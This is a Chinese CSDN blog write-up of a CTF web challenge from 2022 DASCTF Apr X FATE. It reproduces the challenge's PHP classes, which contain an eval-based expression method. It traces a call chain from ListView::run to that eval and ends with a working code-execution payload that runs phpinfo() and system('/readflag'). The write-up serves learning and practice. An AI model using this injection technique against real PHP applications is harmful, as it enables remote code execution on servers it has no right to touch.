2022DASCTF Apr X FATE 防疫挑战赛web复现

最新推荐文章于 2024-04-21 11:16:34 发布
最新推荐文章于 2024-04-21 11:16:34 发布
阅读量251 收藏
点赞数
分类专栏: CTF知识点 文章标签: 前端 php postman
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58970968/article/details/124594385
版权

打开可看到是代码审计,现在的我的水平显然不会做:
所以参考了其他师父的wp;勉勉强强知道点流程,大概就是不断调用各种类中的方法;

首先拿到四个代码,如下:

Base.php
 
<?php
 
class Base
{
 
    public function __get($name)
    {
        $getter = 'get' . $name;
        if (method_exists($this, $getter)) {
            return $this->$getter();
        } else {
            throw new Exception("error property {$name}");
        }
    }
 
    public function __set($name, $value)
    {
        $setter = 'set' . $name;
        if (method_exists($this, $setter)) {
            return $this->$setter($value);
        } else {
            throw new Exception("error property {$name}");
        }
 
    }
 
    public function __isset($name)
    {
        $getter = 'get' . $name;
        if (method_exists($this, $getter))
            return $this->$getter() !== null;
 
        return false;
    }
 
    public function __unset($name)
    {
        $setter = 'set' . $name;
        if (method_exists($this, $setter))
            $this->$setter(null);
 
    }
    public function evaluateExpression($_expression_,$_data_=array())
    {
        if(is_string($_expression_))
        {
            extract($_data_);
            return eval('return '.$_expression_.';');
        }
        else
        {
            $_data_[]=$this;
            return call_user_func_array($_expression_, $_data_);
        }
    }
 
}
Filter.php
 
<?php
 
 
class Filter extends Base
{
 
    public $lastModified;
 
    public $lastModifiedExpression;
 
    public $etagSeed;
 
    public $etagSeedExpression;
    
    public $cacheControl='max-age=3600, public';
 
    
    public function preFilter($filterChain)
    {
 
        $lastModified=$this->getLastModifiedValue();
        $etag=$this->getEtagValue();
 
        if($etag===false&&$lastModified===false)
            return true;
 
        if($etag)
            header('ETag: '.$etag);
 
        if(isset($_SERVER['HTTP_IF_MODIFIED_SINCE'])&&isset($_SERVER['HTTP_IF_NONE_MATCH']))
        {
            if($this->checkLastModified($lastModified)&&$this->checkEtag($etag))
            {
                $this->send304Header();
                $this->sendCacheControlHeader();
                return false;
            }
        }
        elseif(isset($_SERVER['HTTP_IF_MODIFIED_SINCE']))
        {
            if($this->checkLastModified($lastModified))
            {
                $this->send304Header();
                $this->sendCacheControlHeader();
                return false;
            }
        }
        elseif(isset($_SERVER['HTTP_IF_NONE_MATCH']))
        {
            if($this->checkEtag($etag))
            {
                $this->send304Header();
                $this->sendCacheControlHeader();
                return false;
            }
 
        }
 
        if($lastModified)
            header('Last-Modified: '.gmdate('D, d M Y H:i:s', $lastModified).' GMT');
 
        $this->sendCacheControlHeader();
        return true;
    }
 
    
    protected function getLastModifiedValue()
    {
        if($this->lastModifiedExpression)
        {
            $value=$this->evaluateExpression($this->lastModifiedExpression);
            if(is_numeric($value)&&$value==(int)$value)
                return $value;
            elseif(($lastModified=strtotime($value))===false)
                throw new Exception("error");
            return $lastModified;
        }
 
        if($this->lastModified)
        {
            if(is_numeric($this->lastModified)&&$this->lastModified==(int)$this->lastModified)
                return $this->lastModified;
            elseif(($lastModified=strtotime($this->lastModified))===false)
                throw new Exception("error");
            return $lastModified;
        }
        return false;
    }
 
    
    protected function getEtagValue()
    {
        if($this->etagSeedExpression)
            return $this->generateEtag($this->evaluateExpression($this->etagSeedExpression));
        elseif($this->etagSeed)
            return $this->generateEtag($this->etagSeed);
        return false;
    }
 
    
    protected function checkEtag($etag)
    {
        return isset($_SERVER['HTTP_IF_NONE_MATCH'])&&$_SERVER['HTTP_IF_NONE_MATCH']==$etag;
    }
 
    
    protected function checkLastModified($lastModified)
    {
        return isset($_SERVER['HTTP_IF_MODIFIED_SINCE'])&&@strtotime($_SERVER['HTTP_IF_MODIFIED_SINCE'])>=$lastModified;
    }
 
    
    protected function send304Header()
    {
        header('HTTP/1.1 304 Not Modified');
    }
    
    protected function generateEtag($seed)
    {
        return '"'.base64_encode(sha1(serialize($seed),true)).'"';
    }
}
ListView.php
 
<?php
 
abstract class ListView extends Base
{
 
    public $tagName='div';
    public $template;
 
    public function run()
    {
        echo "<".$this->tagName.">\n";
        $this->renderContent();
        echo "<".$this->tagName.">\n";
    }
 
 
    public function renderContent()
    {
        ob_start();
        echo preg_replace_callback("/{(\w+)}/",array($this,'renderSection'),$this->template);
        ob_end_flush();
    }
 
 
    protected function renderSection($matches)
    {
        $method='render'.$matches[1];
        if(method_exists($this,$method))
        {
            $this->$method();
            $html=ob_get_contents();
            ob_clean();
            return $html;
        }
        else
            return $matches[0];
    }
}
TestView.php
 
<?php
 
class TestView extends ListView
{
    const FILTER_POS_HEADER='header';
    const FILTER_POS_BODY='body';
 
    public $columns=array();
    
    public $rowCssClass=array('odd','even');
    
    public $rowCssClassExpression;
    
    public $rowHtmlOptionsExpression;
    
    public $selectableRows=1;
 
    public $data=array();
    public $filterSelector='{filter}';
    
    public $filterCssClass='filters';
    
    public $filterPosition='body';
    
    public $filter;
    
    public $hideHeader=false;
    
 
 
    
    public function renderTableHeader()
    {
        if(!$this->hideHeader)
        {
            echo "<thead>\n";
 
            if($this->filterPosition===self::FILTER_POS_HEADER)
                $this->renderFilter();
 
 
            if($this->filterPosition===self::FILTER_POS_BODY)
                $this->renderFilter();
 
            echo "</thead>\n";
        }
        elseif($this->filter!==null && ($this->filterPosition===self::FILTER_POS_HEADER || $this->filterPosition===self::FILTER_POS_BODY))
        {
            echo "<thead>\n";
            $this->renderFilter();
            echo "</thead>\n";
        }
    }
    
    public function renderFilter()
    {
        if($this->filter!==null)
        {
            echo "<tr class=\"{$this->filterCssClass}\">\n";
 
            echo "</tr>\n";
        }
    }
    
    public function renderTableRow($row)
    {
        $htmlOptions=array();
        if($this->rowHtmlOptionsExpression!==null)
        {
            $data=$this->data[$row];
            $options=$this->evaluateExpression($this->rowHtmlOptionsExpression,array('row'=>$row,'data'=>$data));
            if(is_array($options))
                $htmlOptions = $options;
        }
 
        if($this->rowCssClassExpression!==null)
        {
            $data=$this->dataProvider->data[$row];
            $class=$this->evaluateExpression($this->rowCssClassExpression,array('row'=>$row,'data'=>$data));
        }
        elseif(is_array($this->rowCssClass) && ($n=count($this->rowCssClass))>0)
            $class=$this->rowCssClass[$row%$n];
 
        if(!empty($class))
        {
            if(isset($htmlOptions['class']))
                $htmlOptions['class'].=' '.$class;
            else
                $htmlOptions['class']=$class;
        }
    }
    public function renderTableBody()
    {
        $data=$this->data;
        $n=count($data);
        echo "<tbody>\n";
 
        if($n>0)
        {
            for($row=0;$row<$n;++$row)
                $this->renderTableRow($row);
        }
        else
        {
            echo '<tr><td colspan="'.count($this->columns).'" class="empty">';
 
            echo "</td></tr>\n";
        }
        echo "</tbody>\n";
    }
 
}

Base类evaluateExpression函数存在eval;

 再看看其他方法与evaluateExpression函数有关的;在Fileter类中有两个方法可以,

 但是这两个是不行的,为什么呢,其他大佬的解释是说:调用这两个方法需要用到base类中的_get方法,但是题目似乎无法触发__get()方法,题目进行的是赋值操作,也就是写,所以最多是调用__set()方法;虽然还是不是很理解,继续懵逼着走吧;

然后就是还有TestView类中的renderTableRow方法:

    public function renderTableRow($row)
    {
        $htmlOptions=array();
        if($this->rowHtmlOptionsExpression!==null)
        {
            $data=$this->data[$row];
            $options=$this->evaluateExpression($this->rowHtmlOptionsExpression,array('row'=>$row,'data'=>$data));
            if(is_array($options))
                $htmlOptions = $options;
        }
 
        if($this->rowCssClassExpression!==null)
        {
            $data=$this->dataProvider->data[$row];
            $class=$this->evaluateExpression($this->rowCssClassExpression,array('row'=>$row,'data'=>$data));
        }
        elseif(is_array($this->rowCssClass) && ($n=count($this->rowCssClass))>0)
            $class=$this->rowCssClass[$row%$n];
 
        if(!empty($class))
        {
            if(isset($htmlOptions['class']))
                $htmlOptions['class'].=' '.$class;
            else
                $htmlOptions['class']=$class;
        }
    }

 到这里我们的最终目的是实现 TestView::renderTableRow() --> TestView::evaluateExpression()

然后前面怎么到TestView::renderTableRow() 呢?

 然后看一下题目代码:

    public function __construct($action,$properties){
 
        $object=new $action();
        foreach($properties as $name=>$value)
            $object->$name=$value;
        $object->run();
    }

大佬说后面的$object->run(),这种情况要么就是调用__call()魔术方法,要么就是看看其它类中的run()函数,看看就知道没有__call()方法,所以我们找run(),可以看到只有ListView类中有run()函数:

    public function run()
    {
        echo "<".$this->tagName.">\n";
        $this->renderContent();
        echo "<".$this->tagName.">\n";
    }

这里面有renderContent(),更进:

    public function renderContent()
    {
        ob_start();
        echo preg_replace_callback("/{(\w+)}/",array($this,'renderSection'),$this->template);
        ob_end_flush();
    }

有正则匹配,又用到renderSection,继续更进:

    protected function renderSection($matches)
    {
        $method='render'.$matches[1];
        if(method_exists($this,$method))
        {
            $this->$method();
            $html=ob_get_contents();
            ob_clean();
            return $html;
        }
        else
            return $matches[0];
    }

这里调用链很清晰,通过ListView::run->ListView::renderContent->ListView::renderSection我们可以调用TestView类的任意方法,需要注意的是由于正则匹配的模式,我们需要令$this->template = "{TableBody}"才能正确执行; 为什么是TableBody呢?因为renderTableBody方法可以到 renderTableRow()      

 但是需要对data赋值;

所以总结下来就是调用链就是:

TestView::run() --> TestView::renderContent() --> TestView::renderSection() --> TestView::renderTableBody() --> TestView::renderTableRow() --> TestView::evaluateExpression()

思路清晰啦,最后要做的就是把传入的参数设置好,如:template与正则匹配正确要记得加大括号,data数据要赋值;

最后:

GET: 

?action=TestView

POST: 

properties[template]={TableBody} &properties[data]=2&properties[rowHtmlOptionsExpression]=phpinfo(); //phpinfo()是一个执行语句;为

var_dump(system('/readflag'));

 

参考:

2022DASCTF Apr X FATE 防疫挑战赛 部分web复现_errorr0的博客-CSDN博客

[2022DASCTF Apr X FATE 防疫挑战赛]web题目复现_Snakin_ya的博客-CSDN博客

一只Traveler
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apr2006_d3dx9_30_x64
10-11
Apr2006_d3dx9_30_x64
APR2007_d3dx9_33_x64
10-11
APR2007_d3dx9_33_x64
DASCTF X GFCTF 2024|四月开启第一局
最新发布
qq_61670993的博客
04-21 889
简单题
[DASCTF 2023]controlflow
CHTXRT的博客
07-22 339
直接反编译,通过汇编代码结合动态调试综合分析,得到输入数据变化过程大致如下:(设输入字符串为。出处:https://blog.csdn.net/CHTXRT。」创作共享协议,转载请在文章明显位置注明作者及出处。
全国农信银CTF流量分析(凯撒会分析流量吗)
yoyo_573的博客
06-30 324
流量分析,时间盲注,题目提示了凯撒密码。转换下就得到了结果。
2022DASCTF MAY 出题人挑战赛 misc
mumuzi的博客
05-22 2818
MAYMISC
[DASCTF 7月赛] 复现
qq_61768489的博客
08-17 303
压缩包密码就是上面 的admin密码550f37c7748e。一个png ,用zsteg打开能看见有个zip,提取出来。FTK Imager 打开后Mount 该文件。上面也得到了密文U2Fs.... 是AES密文。再用efdd 打开,配合pc.raw挂载。这串数字是八进制 ,也可直接ciphey。得到了密钥 358daebef0b7d。文件名是thes3cret。访问后有源码,有过滤。...
APR2007_d3dx10_33_x64
10-11
APR2007_d3dx10_33_x64
Packt.Publishing.Seam.2.x.Web.Development.Apr.2009
01-17
此教程从基础讲述了使用Seam的开发过程,是一本很好的入门英文教程,英文内容也比较简单
Apr2005_d3dx9_25_x64.cab
10-12
Apr2005_d3dx9_25_x64.cab
2022DASCTF Apr X FATE 防疫挑战赛
Todog的博客
08-18 3028
2022DASCTF Apr X FATE 防疫挑战赛
2022DASCTF Apr X FATE 防疫挑战赛 Crypto-wp
mxx307的博客
04-26 2177
2022 DASCTF Apr X FATE 防疫挑战赛 Crypto Wp
2021年“极客谷杯”数据安全劳动和技能竞赛部分WP
七堇年的博客
12-24 1534
2021年“极客谷杯”数据安全劳动和技能竞赛WP
2021西湖论剑web部分wp
fmyyy1的博客
11-21 1837
前言 快期末了 忙里偷闲打了西湖论剑,队伍第七,又被队友带飞了,web题目质量还可以 OA?RCE? 环境没有写的权限,本地有打通环境打不通的情况很多 之后在webmain/index/indexAction.php处 有个包含任意php文件 有个查看phpinfo的 看了之后开着register_argc_argv,尝试包含pearcmd payload 第一步 ?m=index&a=getshtml&surl=Li4vLi4vLi4vLi4vLi4vdXNyL2xvY2FsL2x
YII2源码分析(1) --- 基本流程分析
weixin_34187862的博客
11-02 279
前言 本文主要分析Yii2应用的启动、运行的过程,主要包括以下三部分:入口脚本、启动应用、运行应用。在分析源码的过程中主要借助了Xdebug工具。 入口脚本 文件位置:web\index.php //定义全局变量 defined('YII_DEBUG') or define('YII_DEBUG', true); defined('YI...
DASCTF七月赛-web
Pr0m1se1n的博客
08-06 636
之前复现的了。。哎 Ezfileinclude 首页一张图片,看src就可以看出文件包含 验证了时间戳,参数t很容易能看出来 尝试用php://filter 伪协议读源码读不到,发现是用…/路径穿越 然后flag文件后缀不是是.php .txt .jpg什么的,就是flag!!! 直接来大师傅的脚本 import time import requests import base64 time = time.time() #获取时间戳(默认浮点型) t = int(time) #获取整型时间戳 pri
2022DASCTF X SU 三月春季挑战赛
m0_56059226的博客
03-27 960
web ezpop <?php class crow { public $v1; public $v2; function eval() { echo new $this->v1($this->v2); } public function __invoke() { $this->v1->world(); } } class fin { public $f1; ..
APR3三相晶闸管功率调节器用户手册
"APR3系列三相晶闸管功率调节器用户手册,由四川库伦电气有限公司提供,详细介绍了产品的型号定义、订货说明、技术参数、外形安装、电气配线、操作面板、功能设置、MODBUS通讯以及故障处理和保养维护等内容。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值